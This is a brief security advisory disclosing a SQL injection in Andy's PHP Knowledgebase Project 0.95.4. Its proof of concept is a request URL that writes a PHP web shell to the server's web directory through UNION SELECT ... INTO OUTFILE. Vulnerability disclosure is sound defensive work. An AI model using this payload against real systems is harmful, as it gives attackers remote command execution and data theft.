Home
Consulting
Advisories
Software
Articles
Contact

Andy's PHP Knowledgebase Project 0.95.4 SQL Injection

Legacy Advisories

Description

A SQL injection vulnerability can be used to extract arbitrary data. In some environments it may be possible to create a PHP shell.

Proof Of Concept

localhost/aphpkb/plugins/pdfClasses/pdfgen.php?pdfa='and%201=0%20UNION%20SELECT%20'<?php%20system($_GET["CMD"]);%20?>',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23


Copyright © 2018 AutoSec Tools LLC